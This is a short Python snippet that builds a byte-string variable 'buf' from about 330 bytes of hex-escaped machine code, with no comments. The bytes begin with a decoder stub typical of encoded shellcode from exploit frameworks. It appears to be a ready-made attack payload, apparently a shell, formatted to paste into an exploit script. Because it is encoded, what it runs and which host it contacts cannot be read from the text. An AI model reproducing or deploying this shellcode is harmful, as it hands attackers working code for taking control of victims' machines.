buf =  b""
buf += b"\xdd\xc5\xb8\x2c\x02\x85\xf1\xd9\x74\x24\xf4\x5b"
buf += b"\x31\xc9\xb1\x52\x31\x43\x17\x83\xeb\xfc\x03\x6f"
buf += b"\x11\x67\x04\x93\xfd\xe5\xe7\x6b\xfe\x89\x6e\x8e"
buf += b"\xcf\x89\x15\xdb\x60\x3a\x5d\x89\x8c\xb1\x33\x39"
buf += b"\x06\xb7\x9b\x4e\xaf\x72\xfa\x61\x30\x2e\x3e\xe0"
buf += b"\xb2\x2d\x13\xc2\x8b\xfd\x66\x03\xcb\xe0\x8b\x51"
buf += b"\x84\x6f\x39\x45\xa1\x3a\x82\xee\xf9\xab\x82\x13"
buf += b"\x49\xcd\xa3\x82\xc1\x94\x63\x25\x05\xad\x2d\x3d"
buf += b"\x4a\x88\xe4\xb6\xb8\x66\xf7\x1e\xf1\x87\x54\x5f"
buf += b"\x3d\x7a\xa4\x98\xfa\x65\xd3\xd0\xf8\x18\xe4\x27"
buf += b"\x82\xc6\x61\xb3\x24\x8c\xd2\x1f\xd4\x41\x84\xd4"
buf += b"\xda\x2e\xc2\xb2\xfe\xb1\x07\xc9\xfb\x3a\xa6\x1d"
buf += b"\x8a\x79\x8d\xb9\xd6\xda\xac\x98\xb2\x8d\xd1\xfa"
buf += b"\x1c\x71\x74\x71\xb0\x66\x05\xd8\xdd\x4b\x24\xe2"
buf += b"\x1d\xc4\x3f\x91\x2f\x4b\x94\x3d\x1c\x04\x32\xba"
buf += b"\x63\x3f\x82\x54\x9a\xc0\xf3\x7d\x59\x94\xa3\x15"
buf += b"\x48\x95\x2f\xe5\x75\x40\xff\xb5\xd9\x3b\x40\x65"
buf += b"\x9a\xeb\x28\x6f\x15\xd3\x49\x90\xff\x7c\xe3\x6b"
buf += b"\x68\x89\xf4\x71\x6c\xe5\xf6\x75\x7d\xa9\x7f\x93"
buf += b"\x17\x41\xd6\x0c\x80\xf8\x73\xc6\x31\x04\xae\xa3"
buf += b"\x72\x8e\x5d\x54\x3c\x67\x2b\x46\xa9\x87\x66\x34"
buf += b"\x7c\x97\x5c\x50\xe2\x0a\x3b\xa0\x6d\x37\x94\xf7"
buf += b"\x3a\x89\xed\x9d\xd6\xb0\x47\x83\x2a\x24\xaf\x07"
buf += b"\xf1\x95\x2e\x86\x74\xa1\x14\x98\x40\x2a\x11\xcc"
buf += b"\x1c\x7d\xcf\xba\xda\xd7\xa1\x14\xb5\x84\x6b\xf0"
buf += b"\x40\xe7\xab\x86\x4c\x22\x5a\x66\xfc\x9b\x1b\x99"
buf += b"\x31\x4c\xac\xe2\x2f\xec\x53\x39\xf4\x1c\x1e\x63"
buf += b"\x5d\xb5\xc7\xf6\xdf\xd8\xf7\x2d\x23\xe5\x7b\xc7"
buf += b"\xdc\x12\x63\xa2\xd9\x5f\x23\x5f\x90\xf0\xc6\x5f"
buf += b"\x07\xf0\xc2"
